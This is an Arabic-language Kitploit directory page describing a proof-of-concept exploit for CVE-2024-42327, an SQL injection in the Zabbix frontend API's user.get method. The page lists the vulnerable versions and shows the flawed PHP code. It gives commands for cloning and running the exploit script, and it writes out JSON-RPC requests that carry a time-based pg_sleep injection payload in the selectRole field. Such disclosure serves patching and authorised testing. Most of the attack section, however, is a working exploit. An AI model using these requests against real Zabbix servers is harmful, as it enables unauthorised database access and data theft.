Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/depers-rus/cve-2024-42327
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubdepers-rus/cve-2024-42327

CVE-2024-42327

إثبات مفهوم لاستغلال CVE-2024-42327، وهي ثغرة حقن SQL في واجهة Zabbix الأمامية (API) تسمح للمستخدمين غير المسؤولين بتنفيذ استعلامات SQL عشوائية عبر طريقة user.get.

عرض المستودع
3منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

PoC و Exploit لـ CVE-2024-42327 / ZBX-25623

يمكن لحساب مستخدم غير مسؤول في واجهة Zabbix الأمامية مع دور المستخدم الافتراضي، أو أي دور آخر يمنح وصولاً إلى API، استغلال هذه الثغرة الأمنية. توجد ثغرة SQLi في فئة CUser في الدالة addRelatedObjects، ويتم استدعاء هذه الدالة من الدالة CUser.get المتاحة لكل مستخدم لديه وصول إلى API.

изображение

الإصدارات المعرضة للخطر: 6.0.0 - 6.0.31, 6.4.0 - 6.4.16, 7.0.0

الإصدارات المُصلحة: 6.0.32rc1, 6.4.17rc1, 7.0.1rc1

الكود المعرض للخطر

root@kitploit:~
$db_roles = DBselect(
	'SELECT u.userid'.($options['selectRole'] ? ',r.'.implode(',r.', $options['selectRole']) : '').
	' FROM users u,role r'.
	' WHERE u.roleid=r.roleid'.
	' AND '.dbConditionInt('u.userid', $userIds)
);

استخدام الاستغلال:

root@kitploit:~
git clone https://github.com/depers-rus/CVE-2024-42327
python3 cve-2024-42327-PoC.py -t zabbix.xyz.ru -u "depers" -p "passwd"

الطلب:

root@kitploit:~
POST /api_jsonrpc.php  HTTP/1.1
Host: zabbix.xyz.ru
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 186
Content-Type: application/json

{"jsonrpc": "2.0", "method":"user.get", "params": {"selectRole": ["roleid,{SQLi payload}"
], "userids": ["10"
]}, "auth": "---auth_token---", "id": 1}

BurpSuite PoC (حقن SQL زمني)

root@kitploit:~
SELECT pg_sleep(10)) AS DELAY
root@kitploit:~
POST /api_jsonrpc.php  HTTP/1.1
Host: zabbix.xyz.ru
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 186
Content-Type: application/json

{"jsonrpc": "2.0", "method":"user.get", "params": {"selectRole": ["roleid,(SELECT pg_sleep(10)) AS DELAY"
], "userids": ["10"
]}, "auth": "---auth_token---", "id": 1}

الإثبات

изображение

المراجع

  • https://support.zabbix.com/browse/ZBX-25623
  • https://nvd.nist.gov/vuln/detail/CVE-2024-42327
تنزيل الأداة